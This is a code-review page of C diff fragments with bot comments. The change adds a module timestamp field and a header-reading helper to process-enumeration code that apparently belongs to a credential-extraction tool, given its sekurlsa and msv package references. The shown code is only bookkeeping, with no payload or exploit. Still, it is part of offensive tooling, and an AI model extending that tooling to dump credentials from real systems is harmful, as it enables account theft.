information->TimeDateStamp = ntHeaders->FileHeader.TimeDateStamp;
|
||||
LocalFree(ntHeaders);
|
||||
}
|
||||
else information->TimeDateStamp = 0;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg)
|
||||
{
|
||||
if(((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->isFound = RtlEqualUnicodeString(pModuleInformation->NameDontUseOutsideCallback, ((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->name, TRUE))
|
||||
|
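Review bot: The new kull_m_process_adjustTimeDateStamp has no contract comment, and its `else information->TimeDateStamp = 0;` makes "headers unreadable" indistinguishable from a genuinely zero stamp; the only consumer visible on this page (`kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000` in kuhl_m_sekurlsa.c) happens to treat 0 as "old", but that is an accident rather than a stated rule. I would add above the definition: `// Fills information->TimeDateStamp from the module's IMAGE_FILE_HEADER; leaves 0 when kull_m_process_ntheaders fails, so callers must treat 0 as "unknown", not as a real stamp.` The helper is now invoked from all five enumeration paths in kull_m_process_getVeryBasicModuleInformations before every callBack, so each enumerated module costs an extra NT-header read plus the allocation released at `LocalFree(ntHeaders);` — which implies kull_m_process_ntheaders hands back an owned copy, an ownership rule worth stating in that comment since it is otherwise invisible here. The `if(` → `if (` edits at the two copy checks are whitespace noise unrelated to the change.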
@ -324,6 +324,7 @@ VOID kull_m_process_initialise();
|
||||
typedef struct _KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION{
|
||||
KULL_M_MEMORY_ADDRESS DllBase;
|
||||
ULONG SizeOfImage;
|
||||
ULONG TimeDateStamp;
|
||||
PCUNICODE_STRING NameDontUseOutsideCallback;
|
||||
} KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION, *PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION;
|
||||
|
||||
@ -346,6 +347,7 @@ BOOL kull_m_process_getProcessIdForName(LPCWSTR name, PDWORD processId);
|
||||
|
||||
typedef BOOL (CALLBACK * PKULL_M_MODULE_ENUM_CALLBACK) (PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE memory, PKULL_M_MODULE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleFirst(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL kull_m_process_getVeryBasicModuleInformationsForName(PKULL_M_MEMORY_HANDLE memory, PCWSTR name, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION informations);
|
||||
|
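Review bot: The new `ULONG TimeDateStamp;` field in KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION is inserted between SizeOfImage and NameDontUseOutsideCallback with no comment, and because this struct is filled positionally in the package tables (the `{{{NULL, NULL}, 0, 0, NULL}` edits elsewhere in this commit) the insertion point is itself an interface decision that deserves a note. I would document it as `ULONG TimeDateStamp; // IMAGE_FILE_HEADER.TimeDateStamp of the module, 0 when kull_m_process_adjustTimeDateStamp could not read the headers` and give the new prototype a one-line comment stating that it writes only that field and leaves the rest of the struct untouched.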